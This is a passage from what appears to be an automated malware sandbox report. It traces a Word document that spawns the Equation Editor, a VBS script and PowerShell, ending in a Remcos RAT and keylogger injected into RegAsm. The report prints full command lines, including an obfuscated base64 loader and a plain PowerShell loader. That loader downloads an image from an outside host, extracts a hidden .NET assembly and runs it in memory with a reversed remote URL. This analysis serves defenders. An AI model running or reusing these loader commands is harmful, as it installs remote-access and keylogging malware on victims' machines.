                                        2024-09-09 15:34:40 UTC16384INData Raw: 8e 94 b0 3c 55 fd 2e b2 de 58 0d b7 b8 6d a4 60 54 48 c0 83 67 82 0f 5e f9 01 ab a0 00 f4 04 75 c9 d8 0d 1b e0 93 fa 64 98 c9 23 6d 74 bb 26 b8 fa e0 54 b5 8e 7e 1c fc 32 18 b3 12 4f 5b cb f9 2c 5c a8 f5 10 2f d3 cf f2 c8 75 28 05 d8 24 5d 1f 9e 00 fe 99 c3 83 91 59 20 73 cf 4c 0b 33 16 1c b1 35 d2 fd b2 bd 0e 47 7c be df 48 3e fd 30 2e 93 15 52 0f 26 b8 bc d6 d0 ea 36 78 26 a6 32 dc b3 3d 7b 9b 51 98 80 73 9b da 5d 31 8f c2 64 2e ca 5a 51 e9 e3 91 b9 40 1f cf 03 08 83 66 fa fc f0 91 32 a9 16 47 5e f8 c7 fb 3a 63 e5 01 b4 17 2c 28 9f c2 57 ad e7 1d 0c 8a 81 88 52 4a ef 23 9f c3 ef d2 b0 28 fa 97 3b 68 f0 16 be 7c e0 0b b7 62 40 cd 3f f6 5f 96 17 cc 7b 25 c2 0a e3 93 f1 fa e2 b2 69 4a 5f ac 1b 24 55 f3 c7 bd 60 00 4c 7c b2 a4 93 ea b0 09 e3 25 27 75 72 43
                                        Data Ascii: <U.Xm`THg^ud#mt&T~2O[,\/u($]Y sL35G|H>0.R&6x&2={Qs]1d.ZQ@f2G^:c,(WRJ#(;h|b@?_{%iJ_$U`L|%'urC
                                        2024-09-09 15:34:40 UTC16384INData Raw: 65 1c 85 60 4f 5b 6b fe 99 c5 3d 36 bc e7 20 05 1e fa ed e3 f3 18 16 03 cc 56 35 c2 8b eb 94 11 bb 29 2a 09 03 db 2a 2d 6c 13 5e e3 0a 26 db 13 22 9a dc 6c e0 04 06 3d 2f 25 56 cd 75 3e d8 53 3f ee d5 02 28 2b d1 80 e4 e7 42 ae cc 4a ae ea 16 6b f2 c0 8f 2d fa 9e 3e 67 fa e5 41 60 76 92 7a 8e 87 0a 8e f0 4d b8 a6 ea 04 15 71 ee 2b 91 95 92 51 34 e1 c2 aa 5d 0a ed 80 c3 99 c5 4b 23 bf 50 48 36 2b 9f ed ed 93 1f 88 49 f8 4b b2 93 54 77 1c 9d 74 85 8a a9 bb 0b b4 7a b7 0e d4 6f e4 71 51 03 34 05 c7 63 58 1b ba 4f 10 91 34 72 15 91 9e 4d a1 68 b1 f7 ab 1f a6 35 ab d6 4b f7 69 5a 19 59 77 39 a0 77 5f 40 4f 73 c8 00 f3 55 9e 6a 09 8c 3b 88 e6 c5 57 6e 08 39 b3 0f 8a c3 a8 d3 b4 73 22 06 dc cc 5d ae e8 d0 a1 5c f2 2c 7d 70 18 07 57 ad 53 23 6a da 35 44 24 ed 6d
                                        Data Ascii: e`O[k=6 V5)**-l^&"l=/%Vu>S?(+BJk->gA`vzMq+Q4]K#PH6+IKTwtzoqQ4cXO4rMh5KiZYw9w_@OsUj;Wn9s"]\,}pWS#j5D$m
                                        2024-09-09 15:34:40 UTC16384INData Raw: e7 69 e8 73 22 79 c6 ae 09 64 50 54 a8 16 b7 67 93 5f d7 01 e2 91 bb 34 77 41 ba 8f 7c 6e 1d 12 41 a7 54 46 b5 26 d8 5d 58 cc e4 d3 38 86 4a 2d 6a a5 aa b9 e9 8f c0 e4 68 61 06 b7 6c 05 ad 79 e9 80 e4 3a d5 82 0a 2c cc aa 0a 84 02 c9 17 c1 fa 63 47 50 82 16 6d aa 48 ea 6e ae c7 71 98 da c1 10 d3 87 2c 48 50 58 02 d4 2c f0 3f 5c 2e a5 1c f8 7a f9 8c c9 24 71 d8 65 66 04 10 2f 9e 70 3b 57 af 82 02 db d2 46 90 11 c0 52 36 8f 70 7a 65 22 68 e5 1b fc d0 e8 bf 85 80 b2 3e bf 5c 8d 24 b3 b4 65 66 f2 d9 50 2b 33 51 e4 37 c4 e6 66 b3 53 16 96 79 74 ba 78 94 2a bd 6e 1c dd 7c f0 36 5e 78 a1 87 71 5d e7 f8 16 e8 93 81 2a e3 f1 9b 24 6e f4 f4 53 ed 78 a2 b1 9a 1d 36 a6 28 0a 48 f3 aa 31 56 bd dc 1e d9 ab a9 46 d3 c4 01 52 64 24 80 a4 f2 7a 7e 7e f8 19 92 e9 55 d6 49
                                        Data Ascii: is"ydPTg_4wA|nATF&]X8J-jhaly:,cGPmHnq,HPX,?\.z$qef/p;WFR6pze"h>\$efP+3Q7fSytx*n|6^xq]*$nSx6(H1VFRd$z~~UI


                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Target ID:0
                                        Start time:11:34:20
                                        Start date:09/09/2024
                                        Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                        Imagebase:0x13f690000
                                        File size:1'423'704 bytes
                                        MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:7
                                        Start time:11:34:34
                                        Start date:09/09/2024
                                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                        Imagebase:0x400000
                                        File size:543'304 bytes
                                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:8
                                        Start time:11:34:35
                                        Start date:09/09/2024
                                        Path:C:\Windows\SysWOW64\wscript.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\fastgeecleancheckupnewthinkstobege.vbs"
                                        Imagebase:0xd00000
                                        File size:141'824 bytes
                                        MD5 hash:979D74799EA6C8B8167869A68DF5204A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:9
                                        Start time:11:34:36
                                        Start date:09/09/2024
                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?EU? ? ? ? ?TgBE? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?TwBm? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?BP? ? ? ? ?GY? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?C0? ? ? ? ?ZwBl? ? ? ? ?C? ? ? ? ?? ? ? ? ?M? ? ? ? ?? ? ? ? ?g? ? ? ? ?C0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?C0? ? ? ? ?ZwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?Kw? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?u? ? ? ? ?Ew? ? ? ? ?ZQBu? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bi? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BM? ? ? ? ?GU? ? ? ? ?bgBn? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?C0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?EM? ? ? ? ?bwBt? ? ? ? ?G0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?FM? ? ? ? ?dQBi? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?Ew? ? ? ? ?ZQBu? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GM? ? ? ? ?bwBt? ? ? ? ?G0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBD? ? ? ? ?G8? ? ? ? ?bgB2? ? ? ? ?GU? ? ? ? ?cgB0? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?EY? ? ? ? ?cgBv? ? ? ? ?G0? ? ? ? ?QgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?EM? ? ? ? ?bwBt? ? ? ? ?G0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GQ? ? ? ? ?QQBz? ? ? ? ?HM? ? ? ? ?ZQBt? ? ? ? ?GI? ? ? ? ?b? ? ? ? ?B5? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBS? ? ? ? ?GU? ? ? ? ?ZgBs? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?Gk? ? ? ? ?bwBu? ? ? ? ?C4? ? ? ? ?QQBz? ? ? ? ?HM? ? ? ? ?ZQBt? ? ? ? ?GI? ? ? ? ?b? ? ? ? ?B5? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?Ew? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?GM? ? ? ? ?bwBt? ? ? ? ?G0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?GU? ? ? ? ?Z? ? ? ? ?BB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BU? ? ? ? ?Hk? ? ? ? ?c? ? ? ? ?Bl? ? ? ? ?Cg? ? ? ? ?JwBk? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GI? ? ? ? ?LgBJ? ? ? ? ?E8? ? ? ? ?LgBI? ? ? ? ?G8? ? ? ? ?bQBl? ? ? ? ?Cc? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?bQBl? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bv? ? ? ? ?GQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B0? ? ? ? ?Hk? ? ? ? ?c? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?TQBl? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bv? ? ? ? ?GQ? ? ? ? ?K? ? ? ? ?? ? ? ? ?n? ? ? ? ?FY? ? ? ? ?QQBJ? ? ? ? ?Cc? ? ? ? ?KQ? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?bgB2? ? ? ? ?G8? ? ? ? ?awBl? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bu? ? ? ? ?HU? ? ? ? ?b? ? ? ? ?Bs? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?G8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?Fs? ? ? ? ?XQBd? ? ? ? ?C? ? ? ? ?? ? ? ? ?K? ? ? ? ?? ? ? ? ?n? ? ? ? ?HQ? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?QwBI? ? ? ? ?E0? ? ? ? ?Ug? ? ? ? ?v? ? ? ? ?D? ? ? ? ?? ? ? ? ?NQ? ? ? ? ?v? ? ? ? ?DQ? ? ? ? ?O? ? ? ? ?? ? ? ? ?x? ? ? ? ?C4? ? ? ? ?MQ? ? ? ? ?0? ? ? ? ?DI? ? ? ? ?Lg? ? ? ? ?5? ? ? ? ?DM? ? ? ? ?Mg? ? ? ? ?u? ? ? ? ?DU? ? ? ? ?O? ? ? ? ?? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?OgBw? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?Cc? ? ? ? ?I? ? ? ? ?? ? ? ? ?s? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBk? ? ? ? ?GU? ? ? ? ?cwBh? ? ? ? ?HQ? ? ? ? ?aQB2? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Cc? ? ? ? ?I? ? ? ? ?? ? ? ? ?s? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBk? ? ? ? ?GU? ? ? ? ?cwBh? ? ? ? ?HQ? ? ? ? ?aQB2? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Cc? ? ? ? ?I? ? ? ? ?? ? ? ? ?s? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBk? ? ? ? ?GU? ? ? ? ?cwBh? ? ? ? ?HQ? ? ? ? ?aQB2? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Cc? ? ? ? ?L? ? ? ? ?? ? ? ? ?n? ? ? ? ?FI? ? ? ? ?ZQBn? ? ? ? ?EE? ? ? ? ?cwBt? ? ? ? ?Cc? ? ? ? ?L? ? ? ? ?? ? ? ? ?n? ? ? ? ?Cc? ? ? ? ?KQ? ? ? ? ?p? ? ? ? ?? ? ? ? ?==';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                        Imagebase:0xba0000
                                        File size:427'008 bytes
                                        MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:11
                                        Start time:11:34:36
                                        Start date:09/09/2024
                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CHMR/05/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                                        Imagebase:0xba0000
                                        File size:427'008 bytes
                                        MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000B.00000002.394834348.0000000003EA9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.394834348.0000000003EA9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000B.00000002.394834348.0000000003EA9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000B.00000002.394834348.0000000003EA9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:12
                                        Start time:11:34:42
                                        Start date:09/09/2024
                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                        Imagebase:0x910000
                                        File size:64'704 bytes
                                        MD5 hash:8FE9545E9F72E460723F484C304314AD
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.911284833.00000000006D5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
